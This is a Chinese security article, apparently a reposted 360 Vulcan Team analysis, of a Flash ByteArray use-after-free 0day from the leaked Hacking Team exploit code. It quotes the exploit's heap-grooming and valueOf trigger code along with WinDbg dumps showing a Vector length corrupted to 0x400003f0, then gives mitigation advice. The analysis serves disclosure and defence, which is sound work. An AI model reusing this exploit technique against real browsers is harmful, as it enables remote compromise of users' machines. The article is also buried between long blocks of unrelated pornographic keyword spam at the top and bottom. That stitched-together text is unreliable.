精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Hacking Team攻擊代碼分析Part 1:Flash 0day

安全 黑客攻防
最近專門提供通過攻擊手法進行網絡監聽的黑客公司Hacking Team被黑,包含該公司的郵件、文檔和攻擊代碼的400G數據泄漏。360Vulcan Team第一時間獲取了相關信息,并對其中的攻擊代碼進行了分析。

最近專門提供通過攻擊手法進行網絡監聽的黑客公司Hacking Team被黑,包含該公司的郵件、文檔和攻擊代碼的400G數據泄漏。360Vulcan Team第一時間獲取了相關信息,并對其中的攻擊代碼進行了分析。

我們發現其中至少包含了兩個針對Adobe Flash的遠程代碼執行漏洞和一個針對微軟Windows內核字體權限提升漏洞的完整攻擊代碼(exploit)。其中一個Flash漏洞已經在今年4月修補,其他兩個漏洞都未修復。

其中Flash漏洞exploit被設計為可以針對IE、Chrome瀏覽器和Office軟件進行攻擊。攻擊者通過嵌入精心構造的惡意Flash文件到網頁或Office文檔中,使得訪問特定網頁或打開Office文檔的用戶感染惡意代碼。同時,這些惡意代碼通過結合Windows內核字體權限提升漏洞,可以繞過IE(保護模式或增強保護模式)、Chrome(Chrome Sandbox,< Chrome 43)和Office(保護模式)的沙盒保護,完全控制用戶的電腦。

360Vulcan Team對這些漏洞進行分析,并分為三個部分將這些0day的信息共享給安全社區,希望軟件廠商和安全廠商共同行動,盡快修補和防御著這些“在野”的0day漏洞。

Flash 0day -ActionScript ByteArray Buffer Use After Free

看起來HackingTeam的遠程exploit工具中廣泛使用了同一個flash漏洞(攻擊目標可以是IE、Chrome、Office系列):

Hacking Team攻擊代碼分析Part 1:Flash 0day

初步分析這個Exploit之后,我們發現這個Exploit在最新版本的Adobe Flash(18.0.0.194)中仍然可以觸發,因此這應該是一個0day漏洞。

漏洞原理分析

這個漏洞成因在于,Flash對ByteArray內部的buffer使用不當,而造成Use After Free漏洞。

我們來看一下HackingTeam泄露的exploit代碼,關鍵部分如下:

1. 定義ByteArray

for(var i:int; i < alen; i+=3){
                 a[i] = new Class2(i);
                
                 a[i+1] = new ByteArray();
                 a[i+1].length = 0xfa0;
                
                 a[i+2] = new Class2(i+2);
             }

首先定義一系列的ByteArray,這些ByteArray初始大小被設置成0xfa0,ActionScript內部會為每個Buffer分配0×1000大小的內存。

1. 給ByteArray元素賦值:

_ba = a[i];
                 // call valueOf() and cause UaF memory corruption
                 _ba[3] = new Clasz();

這一步是觸發漏洞的關鍵,由于ByteArray的元素類型是Byte,當把Clasz類賦值給ByteArray[3]時,AVM會試圖將其轉化為Byte,此時Clasz的valueOf函數將被調用:

prototype.valueOf = function()
     {
         ref = new Array(5);
         collect.push(ref);
        
         // realloc
         _ba.length = 0x1100;
        
         // use after free
         for (var i:int; i < ref.length; i++)
             ref[i] = new Vector.<uint>(0x3f0);
        
         return 0x40
     }

在valueOf函數中,最關鍵的一部是更改了ByteArray的長度,將其設置成為0×1100,這個操作將會觸發ByteArray內部buffer的重新分配,舊的buffer(大小為0×1000)將會被釋放。緊接著exploit代碼會分配若干個vector對象,每個vector同樣占用0×1000字節的內存,試圖去重新使用已經釋放的ByteArray buffer的內存。

valueOf函數返回0×40,然后0×40會被寫入buffer[3]這里,如果邏輯正確,那么此處應該寫入的是新分配的buffer;然而由于代碼漏洞,這里寫入的已經釋放的0×1000大小的舊buffer,于是事實上寫入的是vector對象的頭部,整個過程如下:

1. ByteArray創建并設置長度0xfe0:

old buffer  |                       |
0                                 0x1000
2.  設置_ba[3],調用valueOf,在valueOf中設置ByteArray.length = 0x1100,此時old buffer被釋放
old buffer (Freed)  |                       |
0                                 0x1000
3.  然后0x1000大小的vector占據old buffer內存,前4個字節是vector的長度字段:
Vector          | f0 03 00 00               |
0                                 0x1000
4.  valueOf返回0x40,0x40被寫入buffer[3],由于UAF漏洞的存在,寫入的是vector的size字段:
Vector          | f0 03 00 40               |
0                                 0x1000

于是我們可以得到一個超長的vector對象:

Hacking Team攻擊代碼分析Part 1:Flash 0day

 

我們可以通過調試來觀察漏洞的觸發過程:

1. 調用valueOf之前

0:005> u
671cf2a5   call     671b0930 //這里最終調用valueOf
671cf2aa 83c404          add     esp,4
671cf2ad 8806            mov     byte ptr [esi],al
671cf2af 5e              pop     esi

此時esi指向old buffer:

0:005> dd esi-3
0dfd5000  00000000 00000000 00000000 00000000
0dfd5010  00000000 00000000 00000000 00000000

2. 調用valueOf之后,old buffer被釋放,然后被vector占據:

此時esi已經指向新分配的vector,就buffer已經被釋放

0:005> dd esi-3
0dfd5000  000003f0 0d2b3000 00000000 00000000
0dfd5010  00000000 00000000 00000000 00000000
0dfd5020  00000000 00000000 00000000 00000000
0dfd5030  00000000 00000000 00000000 00000000
0dfd5040  00000000 00000000 00000000 00000000
0dfd5050  00000000 00000000 00000000 00000000
0dfd5060  00000000 00000000 00000000 00000000
0dfd5070  00000000 00000000 00000000 00000000

3. 寫入buffer[3

接下來valueOf的返回值0x40被寫入buffer[3](及vector.size字段):

0:005> p
eax=00000040 ebx=0d8b4921 ecx=00000206 edx=00000006 esi=0dfd5003 edi=0d362020
eip=671cf2ad esp=04f2ceec ebp=04f2d050 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
Flash32_18_0_0_194!IAEModule_IAEKernel_UnloadModule+0x1ba07d:
671cf2ad 8806            mov     byte ptr [esi],al          ds:0023:0dfd5003=00
0:005> p
Flash32_18_0_0_194!IAEModule_IAEKernel_UnloadModule+0x1ba07f:
671cf2af 5e              pop     esi
0:005> dd esi-3
0dfd5000  400003f0 0d2b3000 00000000 00000000
0dfd5010  00000000 00000000 00000000 00000000
0dfd5020  00000000 00000000 00000000 00000000
0dfd5030  00000000 00000000 00000000 00000000

可以看到vector的長度以及被修改成0x400003f0。

漏洞防范

由于該漏洞利用非常穩定,而Adobe暫時沒有發布該漏洞的補丁,更可怕的是從HackingTeam泄露的數據來看,該exploit還帶有沙盒突破提權功能,危害甚大。我們建議補丁發布之前,可以暫時先禁用flash插件;也可以開啟Chrome或Chrome核心瀏覽器針對插件的Click-to-Run功能,來緩解Flash 0day的攻擊。

責任編輯:藍雨淚 來源: 奇虎360公司技術博客
相關推薦

2015-07-08 13:52:18

2015-07-14 10:53:19

Hacking Tea0Day漏洞

2015-07-14 11:00:16

2015-07-08 13:36:24

2015-07-15 12:50:27

微軟IE11

2015-07-14 10:33:19

2022-03-25 13:41:55

漏洞網絡攻擊Quantum(量子

2011-02-28 09:34:55

2011-08-26 11:44:01

2009-07-15 16:29:03

2023-01-12 12:00:33

2016-05-03 09:27:21

2009-07-06 13:15:07

2015-09-23 13:38:42

2011-07-18 14:29:46

2013-12-02 14:50:25

2015-05-20 16:34:14

2014-10-15 17:29:33

2015-07-08 11:06:59

2021-10-06 13:48:50

0day漏洞攻擊
點贊
收藏

51CTO技術棧公眾號

国产一级18片视频| 在线观看日本一区二区| 亚洲色图狠狠干| 久久伊人亚洲| 日韩视频在线免费| 男人女人拔萝卜视频| 忘忧草在线日韩www影院| 欧美国产日本韩| 91九色在线观看| av中文在线播放| 97视频热人人精品免费| 日韩女优av电影在线观看| 国产精品免费入口| 欧美日韩在线看片| 99天天综合性| 国产欧美日韩高清| 黄色片视频网站| 成人直播大秀| 亚洲精品白浆高清久久久久久| youjizzxxxx18| av影院在线| 亚洲欧洲无码一区二区三区| 久久久一本精品99久久精品66| 在线观看免费中文字幕| 中国女人久久久| 欧美精品免费在线观看| 亚洲精品成人av久久| 国产精品zjzjzj在线观看| 欧美日韩国产另类一区| 久久精品视频16| 污视频在线看网站| 国产精品久久久久久久久果冻传媒 | 韩国主播福利视频一区二区三区| 亚洲激情在线播放| 伊甸园精品99久久久久久| 婷婷丁香花五月天| 国产成人免费在线观看| 成人福利网站在线观看11| 中文字幕精品视频在线观看| 影音先锋久久| 欧美成人在线影院| av黄色免费在线观看| 精品99久久| 亚洲欧美另类在线观看| 右手影院亚洲欧美| 日韩极品在线| 亚洲第一视频网站| av在线播放网址| 一区中文字幕| 欧美va亚洲va| wwwww在线观看| 中文字幕av一区二区三区四区| 欧美精品亚洲二区| av在线网址导航| 久久久免费人体| 欧美日本在线播放| 自拍偷拍一区二区三区四区| 日韩三区四区| 91精品国产综合久久久久久久久久| 奇米影音第四色| 开心久久婷婷综合中文字幕| 欧美日韩一区在线观看| 污污网站免费观看| 只有精品亚洲| 日韩你懂的在线观看| 中文字幕一区二区三区人妻在线视频 | 高清日韩av电影| 国产欧美精品日韩区二区麻豆天美| 欧美一区免费视频| 北岛玲一区二区三区| 中文字幕成人网| 亚洲自拍偷拍一区二区三区| 超碰个人在线| 亚洲一二三四在线| 欧美成人一区二区在线观看| 爱情电影社保片一区| 色综合久久久久久久久| 无限资源日本好片| 爱情电影网av一区二区| 精品精品国产高清a毛片牛牛 | 日本精品www| av在线日韩| 911精品国产一区二区在线| 真实乱偷全部视频| 欧美亚洲tv| 一色桃子一区二区| 国产一二三区精品| 亚洲激情网站| 日韩av免费一区| 97人妻精品一区二区三区视频| 国产精品中文欧美| 精品卡一卡二| 自拍视频在线免费观看| 亚洲精品免费在线观看| 男人添女荫道口女人有什么感觉| 国产三级电影在线播放| 欧美中文字幕一区| 99国产精品免费视频| 三级小说欧洲区亚洲区| 日韩在线资源网| 自拍偷拍欧美亚洲| 老司机午夜精品99久久| 国模一区二区三区私拍视频| 97电影在线看视频| 亚洲线精品一区二区三区 | 韩日精品视频一区| 狠狠色伊人亚洲综合网站色| 亚洲s色大片| 欧美日韩国产精品一区| 看看黄色一级片| 欧美有码在线| 欧美精品少妇videofree| 午夜婷婷在线观看| 国产91精品一区二区麻豆亚洲| 日本成人三级电影网站| 黄色影院在线看| 欧美日韩精品电影| 午夜理伦三级做爰电影| 欧美三级特黄| 成人精品久久一区二区三区| 欧美新色视频| 亚洲国产一区二区a毛片| 91制片厂毛片| 亚洲最大在线| 午夜精品久久久久久久久久久久久 | 午夜视频在线免费观看| 欧美性猛交xxxx偷拍洗澡| 初高中福利视频网站| 日韩伦理视频| 国产精品久久久久久久久影视 | 中文字幕亚洲欧美在线| 国内自拍视频在线播放| 丁香桃色午夜亚洲一区二区三区| 在线一区亚洲| 精品美女一区| 国产一区二区三区视频免费| 日本中文字幕久久| 99精品国产99久久久久久白柏| 欧美性受黑人性爽| 久久天天久久| 综合国产在线观看| 波多野结衣一本一道| 成人国产激情在线| 国产一级在线播放| 中文字幕资源网在线观看| 精品动漫一区二区| 无码人妻aⅴ一区二区三区玉蒲团| 国产精品成人免费观看| 国产手机视频一区二区 | 久久精品视频1| av资源站一区| 欧美 日韩 国产 高清| 国产成人夜色高潮福利影视| 久久69精品久久久久久久电影好| 国产伦精品一区二区三区四区| 国产精品久久毛片a| 污污动漫在线观看| 成人久久久久| 国产在线观看精品一区二区三区| 在线播放日本| 欧美久久久久中文字幕| 91麻豆精品成人一区二区| 久久电影网电视剧免费观看| 中文字幕日韩一区二区三区不卡| 四虎精品一区二区免费| 久色乳综合思思在线视频| 精品美女www爽爽爽视频| 一区二区三区精品视频| 污污免费在线观看| 国产精品毛片在线看| 欧美乱偷一区二区三区在线| 免费日韩电影| 日韩在线欧美在线| 精品国产无码一区二区三区| 亚洲一区二区三区小说| 青青草成人免费视频| 久久精品盗摄| 一区二区三区四区欧美| 日本在线一区二区三区| 国内揄拍国内精品少妇国语| 欧美在线观看在线观看| 欧美精品三级日韩久久| 日本黄色免费片| 成人午夜在线视频| 午夜精品久久久内射近拍高清| 欧洲乱码伦视频免费| 91精品在线影院| 女人黄色免费在线观看| 亚洲另类激情图| 国产精品久久综合青草亚洲AV| 亚洲一级在线观看| 欧美黄色激情视频| 国产高清亚洲一区| 成人在线看视频| 午夜欧美精品| 日本一区免费在线观看| 久久久国产精品入口麻豆| 91精品国产91久久久| 在线观看av黄网站永久| 亚洲国产精品电影在线观看| 精品国产青草久久久久96| 亚洲一区国产视频| 综合 欧美 亚洲日本| 不卡一区二区三区四区| 中文字幕在线观看第三页| 午夜精彩国产免费不卡不顿大片| 欧美日韩精品免费观看| 视频精品一区二区三区| 日韩69视频在线观看| 性欧美videos高清hd4k| 一本一本久久a久久精品综合小说 一本一本久久a久久精品牛牛影视 | 国产精品爱啪在线线免费观看| 久草在线视频福利| 日韩色av导航| 日本啊v在线| 欧美一级高清大全免费观看| 欧美一级黄视频| 岛国av一区二区三区| 欧美黄色免费看| 国产精品成人免费在线| 91中文字幕永久在线| 成人免费观看av| 午夜影院免费版| 美女免费视频一区二区| 久久久久久久少妇| 国产精品一卡| 每日在线观看av| 欧美精品综合| 午夜久久久久久久久久久| 日韩欧美午夜| 视频在线精品一区| 国产欧美日韩在线一区二区 | 污污的视频免费| 免费av成人在线| 免费在线观看亚洲视频| 影音先锋久久资源网| 7777在线视频| 99久久精品费精品国产风间由美| 麻豆av一区二区| 成人h动漫精品一区二区器材| 亚洲一区中文字幕| 九九热这里有精品| 国产成人久久久| 三级成人在线| 欧美在线视频一区| 国产福利电影在线播放| 久久视频国产精品免费视频在线| 国产在线视频网站| 亚洲乱码一区av黑人高潮| 免费看黄色一级视频| 欧美变态口味重另类| aaa一区二区三区| 欧美日韩免费观看一区二区三区| 中文字幕欧美人妻精品一区蜜臀| 一本一道久久a久久精品综合蜜臀| 国产亚洲精品久久久久久打不开| 中文一区二区在线观看| 美国美女黄色片| 中文字幕精品—区二区四季| 91成人在线免费视频| 国产精品久久久久久亚洲毛片 | 97在线国产视频| 99精品视频免费观看| 成人黄色大片网站| 黑人一区二区| 国产1区2区在线| 久久久久综合| 激情网站五月天| 秋霞午夜av一区二区三区| 黄色国产小视频| 快she精品国产999| 天天操天天爱天天爽| 日韩影院精彩在线| 91精品无人成人www| 国产一区不卡精品| 国产艳妇疯狂做爰视频 | 91热福利电影| 福利在线一区| 久久狠狠久久综合桃花| 伊人久久大香线蕉av不卡| 亚洲高清资源综合久久精品| 色狮一区二区三区四区视频| 久久免费视频2| 欧美另类综合| 浮妇高潮喷白浆视频| 久久久久久婷| 爽爽爽在线观看| 99国产精品99久久久久久| 国产福利短视频| 国产精品欧美精品| 国产精品成人网站| 91久久精品一区二区| 国产又爽又黄免费软件| 日韩av最新在线观看| 浮生影视网在线观看免费| 久久精品91久久香蕉加勒比| 两个人看的在线视频www| 国产精品久久不能| 日韩一二三区| 五月婷婷一区| 韩日成人在线| 久久综合久久色| 成人深夜在线观看| 免费看黄色av| 一区二区三区精品视频在线| av首页在线观看| 日韩欧美国产高清| 久草在线青青草| 97国产精品免费视频| 韩国精品视频在线观看 | 国产日韩欧美视频在线观看| 337p日本欧洲亚洲大胆色噜噜| 国产美女性感在线观看懂色av| 久久国产精品影片| 奇米777日韩| 91亚洲精品丁香在线观看| 杨幂一区二区三区免费看视频| 国产高清精品软男同| 99re国产精品| 亚洲一区二区福利视频| 91偷拍与自偷拍精品| 日本一二三区不卡| 欧美人妇做爰xxxⅹ性高电影 | 日韩乱码人妻无码中文字幕| 欧美日韩一区二区三区在线看| 成人小说亚洲一区二区三区| 久热精品视频在线| 粉嫩91精品久久久久久久99蜜桃| 国产伦精品一区二区三区四区免费| 亚洲精品小说| 日本在线观看免费视频| 91亚洲资源网| 日韩av片在线播放| 日韩一级完整毛片| 在线日本中文字幕| 国产精品久久91| 美女亚洲一区| 日韩免费在线观看av| 国产九色精品成人porny | 中文字幕精品三区| 久久精品国产亚洲av麻豆蜜芽| 亚洲国产欧美精品| 888av在线视频| 亚洲伊人久久大香线蕉av| 日韩成人三级| 三上悠亚av一区二区三区| 337p粉嫩大胆色噜噜噜噜亚洲| 久艹视频在线观看| 精品日韩欧美一区二区| 黄色网页在线看| 国产精品视频一区国模私拍 | 久久久久久久久久一区二区三区| 欧美日韩综合在线| 亚洲色欧美另类| 秋霞av国产精品一区| 天堂av一区二区三区在线播放| 黄色三级中文字幕| 国产成人综合精品三级| 乱h高h女3p含苞待放| 日韩免费高清av| 怡红院av在线| 99久久一区三区四区免费| 亚洲日本欧美| 岛国精品资源网站| 欧美日韩亚洲精品一区二区三区| 四虎永久在线精品免费网址| 国产做受高潮69| 国产成人一区二区三区影院| 黑森林福利视频导航| 国产亚洲欧美日韩日本| 亚洲专区第一页| 久久在线免费视频| 精品成人自拍视频| 国产网站免费在线观看| 久久综合九色综合97_久久久| 中文字幕乱码在线观看| 色婷婷综合成人| 国产麻豆一区二区三区| 精品久久一二三| 国产亚洲成年网址在线观看| 中文字幕日韩国产| 欧美极品少妇全裸体| 猫咪成人在线观看| 亚洲精品久久久中文字幕| 亚洲色图在线视频| 蜜臀av在线观看| 国产精品成人av在线| 99视频精品视频高清免费| 国产精品久久久久久9999| 一区二区三区免费观看| 五月天婷婷激情网| 国产精品午夜一区二区欲梦| 亚洲精品a级片| 苍井空张开腿实干12次| 亚洲乱码一区二区三区在线观看| 在线视频你懂得| 欧美成人一区二区三区电影| 久久影视三级福利片| 国产一区二区在线免费播放| 国产精品福利av|